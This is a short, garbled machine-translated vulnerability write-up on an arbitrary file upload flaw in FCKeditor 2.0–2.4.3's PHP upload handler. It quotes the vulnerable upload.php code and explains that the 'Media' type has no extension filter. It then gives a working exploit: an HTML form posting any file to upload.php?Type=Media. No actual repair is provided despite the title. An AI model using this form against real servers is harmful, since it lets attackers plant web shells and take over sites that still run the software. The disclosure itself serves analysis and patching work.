FCKeditor 2.0-2.4.3 vulnerability Exp and repair

Vulnerability Analysis:

Version 2.0-2.2

FCKeditor/editor/filemanager/upload/php/upload. php

# $ SType = isset ($ _ GET [Type])? $ _ GET [Type]: File;

#

# // Get the allowed and denied extensions arrays.

# $ ArAllowed = $ Config [AllowedExtensions] [$ sType];

# $ ArDenied = $ Config [DeniedExtensions] [$ sType];

Here we will send any type of files that are not uploaded with the extension ". php" in files, FLASH, images, and text.

Version 2.3.0-2.4.3:

FCKeditor/editor/filemanager/upload/php/upload. php

# $ SType = isset ($ _ GET [Type])? $ _ GET [Type]: File;

# // Check if it is an allowed type.

# If (! In_array ($ sType, array (File, Image, Flash, Media )))

# SendResults (1, Invalid type specified );

# // Get the allowed and denied extensions arrays.

# $ ArAllowed = $ Config [AllowedExtensions] [$ sType];

# $ ArDenied = $ Config [DeniedExtensions] [$ sType];

In this code we can see filter by Type, but in config. php

$ Config [AllowedExtensions] [Media] and

$ Config [DeniedExtensions] [Media] not exists ))

When the sending type is media, you can upload any file.

Exploit:

<Form enctype = "multipart/form-data" action = "http: // localhost/FCKeditor/editor/filemanager/upload/php/upload. php? Type = Media "method =" post "> <input name =" NewFile "type =" file "> <input type =" submit "value =" submit "> </form>

Www.2cto.com:

The problem is clear. Exp is also Type = Media. Just modify it.